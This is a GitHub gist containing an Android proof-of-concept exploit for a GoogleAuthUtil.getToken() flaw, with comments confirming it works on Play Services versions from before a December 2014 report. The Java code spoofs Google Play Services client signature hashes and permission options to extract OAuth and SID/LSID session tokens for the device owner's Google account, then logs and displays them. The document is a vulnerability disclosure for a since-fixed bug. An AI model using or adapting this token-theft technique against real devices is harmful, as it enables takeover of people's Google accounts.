Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
PoC for Android GoogleAuthUtil.getToken() bug
package com.isciurus.oauth_poc;
import java.io.IOException;
import java.text.DateFormat;
import java.util.Date;
import com.google.android.gms.auth.GoogleAuthException;
import com.google.android.gms.auth.GoogleAuthUtil;
import com.google.android.gms.auth.UserRecoverableAuthException;
import android.accounts.AccountManager;
import android.app.Activity;
import android.content.Intent;
import android.os.AsyncTask;
import android.os.Bundle;
import android.util.Log;
import android.widget.TextView;
public class MainActivity extends Activity {
public static String _log_str = null;
public static OAuthPoCtask task;
public String accountName = "";
@Override
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
if (resultCode == RESULT_OK) {
accountName = data.getStringExtra(AccountManager.KEY_ACCOUNT_NAME);
Log.d("isciurus", "got primary account: " + accountName);
task = new OAuthPoCtask();
task.execute(this);
}
}
private class LeakEmail extends AsyncTask<MainActivity, String, String> {
@Override
protected String doInBackground(MainActivity... mContext) {
Log.d("isciurus", "getting primary account");
Intent aci = AccountManager.newChooseAccountIntent(null, null,
new String[]{"com.google"}, false, null, null, null, null);
startActivityForResult(aci, 0);
return null;
}
}
private class OAuthPoCtask extends AsyncTask<MainActivity, String, String> {
protected String doInBackground(MainActivity... mContext) {
String service = "SID";
String service2 = "LSID";
Bundle bdl = new Bundle();
bdl.putString("_opt_has_permission", "1");
bdl.putString("_opt_add_account", "1");
bdl.putString("_opt_system_partition", "1");
bdl.putString("_opt_client_sig", "58e1c4133f7441ec3d2c270270a14802da47ba0e");
bdl.putString("_opt_app", "com.google.android.gms");
String token0 = "", token01 = "", token1 = "", token2 = "";
try {
Log.d("isciurus", "[test 1]");
token0 = GoogleAuthUtil.getToken(mContext[0], accountName,
"oauth2:https://www.googleapis.com/auth/plus.login", bdl);
} catch (UserRecoverableAuthException e) {
Log.d("isciurus", "getting token failed, replacing the signature");
bdl.remove("_opt_client_sig");
bdl.putString("_opt_client_sig", "38918a453d07199354f8b19af05ec6562ced5788");
try {
token0 = GoogleAuthUtil.getToken(mContext[0], accountName,
"oauth2:https://www.googleapis.com/auth/plus.login", bdl);
} catch (UserRecoverableAuthException e1) {
e1.printStackTrace();
} catch (IOException e1) {
e1.printStackTrace();
} catch (GoogleAuthException e1) {
e1.printStackTrace();
}
} catch (GoogleAuthException e) {
e.printStackTrace();
}
catch (IOException e) {
e.printStackTrace();
}
if(token0 == "")
Log.d("isciurus", "[test 1] failed");
else
Log.d("isciurus", "[test 1] ok");
try {
Log.d("isciurus", "[test 2]");
token1 = GoogleAuthUtil.getToken(mContext[0], accountName, service, bdl);
} catch (UserRecoverableAuthException e) {
e.printStackTrace();
} catch (GoogleAuthException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
try {
token2 = GoogleAuthUtil.getToken(mContext[0], accountName, service2, bdl);
} catch (UserRecoverableAuthException e) {
e.printStackTrace();
} catch (GoogleAuthException e) {
e.printStackTrace();
}
catch (IOException e) {
e.printStackTrace();
}
if(token1 == "" || token2 == "")
Log.d("isciurus", "[test 2] fail");
else
Log.d("isciurus", "[test 2] ok");
_log_str = "token0=" + token0 + "\r\ntoken01=" + token01 + "\r\n" +
"SID=" + token1 + "\r\nLSID=" + token2;
Log.d("isciurus", _log_str);
runOnUiThread(new Runnable() {
@Override
public void run() {
TextView t=(TextView) findViewById(R.id.text1);
t.setText(MainActivity._log_str);
}
});
return "";
}
}
@SuppressWarnings("deprecation")
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
TextView t=(TextView) findViewById(R.id.text1);
t.setText("loading");
String currentDateTimeString = DateFormat.getDateTimeInstance().format(new Date());
Log.d("isciurus", currentDateTimeString);
LeakEmail leak_fn = new LeakEmail();
leak_fn.execute(this);
}
}

myanimal commented Jan 9, 2015

Interesting. I can't reproduce the results though. I've tried on a couple of devices (Android 4 and 5), a couple of Play Services versions (both 6+) and a couple of Google accounts. Both tests always fail.

D/isciurus﹕ 9 Jan 2015 11:59:42
D/isciurus﹕ getting primary account
D/isciurus﹕ got primary account: me@gmail.com
D/isciurus﹕ [test 1]
W/System.err﹕ com.google.android.gms.auth.GoogleAuthException: Unknown
W/System.err﹕ at com.google.android.gms.auth.GoogleAuthUtil.getToken(Unknown Source)
D/isciurus﹕ [test 1] failed
D/isciurus﹕ [test 2]
W/System.err﹕ com.google.android.gms.auth.UserRecoverableAuthException: NeedPermission
W/System.err﹕ at com.google.android.gms.auth.GoogleAuthUtil.getToken(Unknown Source)
D/isciurus﹕ [test 2] fail
D/isciurus﹕ token0=
    token01=
    SID=
    LSID=

You could add the link of the article as a comment inside of the gist :-)

And good job!

Owner

isciurus commented Jan 9, 2015

2 myanimal:
You can try reproducing on older (before December 2, 2014) versions of Google Play before I reported it. I don't know how to downgrade, but I have an apk from that time.

Thanks @isciurus, I can confirm this is reproducible on Play Services 6.1.11 (~ 3 October 2104). Looks like it's fixed in both the 6.1 and 6.5 branches. Good job and thanks for reporting it!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment